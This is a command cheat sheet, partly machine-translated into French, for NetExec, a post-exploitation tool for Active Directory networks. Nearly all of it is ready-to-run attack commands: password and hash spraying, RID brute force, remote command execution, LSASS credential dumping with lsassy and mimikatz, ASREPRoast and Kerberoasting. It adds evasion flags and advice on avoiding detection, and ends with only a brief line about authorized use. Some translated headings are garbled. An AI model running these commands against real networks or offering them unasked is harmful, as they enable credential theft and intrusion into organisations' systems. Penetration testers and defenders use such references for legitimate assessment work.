Exec net
Copier toutes les commandes
Générer PDF
NetExec (anciennement CrackMapExec) est un outil post-exploitation qui permet d'automatiser l'évaluation de la sécurité des grands réseaux Active Directory grâce à l'abus de protocole réseau et aux attaques de justificatifs.
Installation et configuration
Command |
Description |
pip3 install netexec |
Install NetExec via pip |
pipx install netexec |
Install with pipx (recommended) |
git clone https://github.com/Pennyw0rth/NetExec.git |
Clone from GitHub |
cd NetExec && pip3 install . |
Install from source |
netexec --version |
Check installed version |
netexec --help |
Display help information |
Utilisation de base
Command |
Description |
netexec smb 192.168.1.0/24 |
Scan SMB on subnet |
netexec smb 192.168.1.100 -u username -p password |
Authenticate with credentials |
netexec smb 192.168.1.100 -u username -H ntlmhash |
Authenticate with NTLM hash |
netexec smb 192.168.1.100 -u '' -p '' |
Anonymous authentication |
netexec smb targets.txt -u username -p password |
Use target file |
Appui au protocole
Protocole SMB
Command |
Description |
netexec smb 192.168.1.100 |
Basic SMB enumeration |
netexec smb 192.168.1.100 --shares |
Enumerate shares |
netexec smb 192.168.1.100 --users |
Enumerate users |
netexec smb 192.168.1.100 --groups |
Enumerate groups |
netexec smb 192.168.1.100 --local-groups |
Enumerate local groups |
netexec smb 192.168.1.100 --sessions |
Enumerate sessions |
netexec smb 192.168.1.100 --disks |
Enumerate disks |
Protocole WinRM
Command |
Description |
netexec winrm 192.168.1.100 -u username -p password |
WinRM authentication |
netexec winrm 192.168.1.100 -u username -p password -x "whoami" |
Execute command |
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1 |
Execute PowerShell script |
Protocole LDAP
Command |
Description |
netexec ldap 192.168.1.100 -u username -p password |
LDAP authentication |
netexec ldap 192.168.1.100 -u username -p password --users |
Enumerate LDAP users |
netexec ldap 192.168.1.100 -u username -p password --groups |
Enumerate LDAP groups |
netexec ldap 192.168.1.100 -u username -p password --computers |
Enumerate computers |
Protocole MSSQL
Command |
Description |
netexec mssql 192.168.1.100 -u username -p password |
MSSQL authentication |
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version" |
Execute SQL query |
netexec mssql 192.168.1.100 -u username -p password --local-auth |
Local authentication |
Protocole SSH
Command |
Description |
netexec ssh 192.168.1.100 -u username -p password |
SSH authentication |
netexec ssh 192.168.1.100 -u username -k id_rsa |
SSH key authentication |
netexec ssh 192.168.1.100 -u username -p password -x "id" |
Execute command |
Méthodes d'authentification
Authentification du mot de passe
Command |
Description |
netexec smb 192.168.1.100 -u username -p password |
Single credential |
netexec smb 192.168.1.100 -u users.txt -p passwords.txt |
Credential lists |
netexec smb 192.168.1.100 -u username -p passwords.txt |
Password spraying |
netexec smb 192.168.1.100 -u users.txt -p password |
User enumeration |
Authentification en Hash
Command |
Description |
netexec smb 192.168.1.100 -u username -H ntlmhash |
NTLM hash |
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash |
LM:NTLM hash |
netexec smb 192.168.1.100 -u users.txt -H hashes.txt |
Hash lists |
Authentification Kerberos
Command |
Description |
netexec smb 192.168.1.100 -u username -p password -k |
Kerberos authentication |
netexec smb 192.168.1.100 -u username --use-kcache |
Use Kerberos cache |
netexec smb 192.168.1.100 -u username -p password --kerberos |
Force Kerberos |
Énumération
Énumération des parts
Command |
Description |
netexec smb 192.168.1.100 --shares |
List shares |
netexec smb 192.168.1.100 --shares -u username -p password |
Authenticated share listing |
netexec smb 192.168.1.100 --spider SHARE |
Spider share contents |
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt" |
Search for files |
Énumération des utilisateurs
Command |
Description |
netexec smb 192.168.1.100 --users |
Enumerate users |
netexec smb 192.168.1.100 --rid-brute |
RID bruteforce |
netexec smb 192.168.1.100 --users --rid-brute 1000-2000 |
RID range |
Énumération des groupes
Command |
Description |
netexec smb 192.168.1.100 --groups |
Enumerate groups |
netexec smb 192.168.1.100 --local-groups |
Local groups |
netexec smb 192.168.1.100 --groups "Domain Admins" |
Specific group |
Énumération par ordinateur
Command |
Description |
netexec ldap 192.168.1.100 --computers |
Enumerate computers |
netexec smb 192.168.1.100 --computers |
SMB computer enumeration |
Exécution des commandes
Exécution de la commande SMB
Command |
Description |
netexec smb 192.168.1.100 -u username -p password -x "whoami" |
Execute command |
netexec smb 192.168.1.100 -u username -p password -X script.ps1 |
Execute PowerShell script |
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec |
Use WMI execution |
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec |
Use SMB execution |
Exécution de la commande WinRM
Command |
Description |
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process" |
PowerShell command |
netexec winrm 192.168.1.100 -u username -p password -X script.ps1 |
Execute script |
Modules
Modules intégrés
Command |
Description |
netexec smb 192.168.1.100 -M spider_plus |
Enhanced spidering |
netexec smb 192.168.1.100 -M enum_avproducts |
Enumerate AV products |
netexec smb 192.168.1.100 -M gpp_password |
Group Policy Preferences |
netexec smb 192.168.1.100 -M lsassy |
LSASS dumping |
netexec smb 192.168.1.100 -M mimikatz |
Mimikatz execution |
Options du module
Command |
Description |
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false |
Module options |
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true |
Bloodhound output |
Opérations de bases de données
Command |
Description |
netexec smb 192.168.1.100 --users --export users.csv |
Export to CSV |
netexec db |
Database management |
netexec db --workspace default |
Set workspace |
netexec db --clear-database |
Clear database |
Caractéristiques avancées
Stuffing à titre d'élément constitutif
Command |
Description |
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success |
Continue on success |
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3 |
Fail limit |
Politique sur le mot de passe
Command |
Description |
netexec smb 192.168.1.100 --pass-pol |
Get password policy |
netexec ldap 192.168.1.100 --pass-pol |
LDAP password policy |
Intégration de Bloodhound
Command |
Description |
netexec ldap 192.168.1.100 -u username -p password --bloodhound |
Collect Bloodhound data |
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All |
All collections |
ATREPRoast
Command |
Description |
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt |
ASREPRoast attack |
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt |
Authenticated ASREPRoast |
Kerberoasting
Command |
Description |
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt |
Kerberoasting attack |
Production et exploitation
Command |
Description |
netexec smb 192.168.1.100 --verbose |
Verbose output |
netexec smb 192.168.1.100 --debug |
Debug output |
netexec smb 192.168.1.100 -o output.txt |
Save output to file |
netexec smb 192.168.1.100 --log logs/ |
Log directory |
Configuration
Fichier de configuration (~/.nxc/nxc.conf)
[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0
Options propres à chaque protocole
Command |
Description |
netexec smb 192.168.1.100 --port 445 |
Custom port |
netexec smb 192.168.1.100 --timeout 5 |
Connection timeout |
netexec smb 192.168.1.100 --threads 100 |
Thread count |
Techniques d'évacuation
Command |
Description |
netexec smb 192.168.1.100 --jitter 1-5 |
Random delay |
netexec smb 192.168.1.100 --delay 2 |
Fixed delay |
netexec smb 192.168.1.100 --obfs |
Obfuscation |
Scénarios d'attaque communs
Énumération des domaines
# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers
# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares
# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol
```_
### Attaques crédibles
```bash
# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success
# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt
```_
### Après exploitation
```bash
# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"
# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy
# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All
Intégration avec d'autres outils
Intégration de l'empacket
Command |
Description |
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec |
Use Impacket WMI |
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec |
Use Impacket SMB |
Migration de Crackmapexec
Command |
Description |
netexec --convert-cme-db |
Convert CME database |
alias cme='netexec' |
Create alias for compatibility |
Dépannage
Command |
Description |
netexec --help |
General help |
netexec smb --help |
Protocol-specific help |
netexec -v |
Version information |
netexec --debug smb 192.168.1.100 |
Debug mode |
Meilleures pratiques
- Utiliser l'authentification avant le dénombrement si possible
- Mettre en place des délais appropriés pour éviter la détection
- Utiliser des espaces de travail pour organiser différents engagements
- Résultats des exportations pour analyse plus approfondie
- Combiner avec d'autres outils pour une évaluation complète
- Surveiller les réactions défensives
- Utiliser le nombre de fils approprié pour éviter les cibles écrasantes
- Mettre en place un système d'enregistrement approprié pour la documentation
- Valider les références avant les attaques à grande échelle
- Utiliser des techniques d'obfuscation si nécessaire
Considérations en matière de sécurité
- Utilisation uniquement sur les réseaux autorisés
- Mettre en place des contrôles d'accès appropriés
- Moniteur de détection par des outils de sécurité
- Utiliser les principes de moindre privilège
- Documenter toutes les activités de conformité
- Coordonner avec l'équipe bleue le cas échéant
- Mettre en œuvre des procédures de nettoyage appropriées
- Stocker les identifiants en toute sécurité
- Utiliser la communication cryptée si possible
- Mises à jour régulières pour maintenir l'efficacité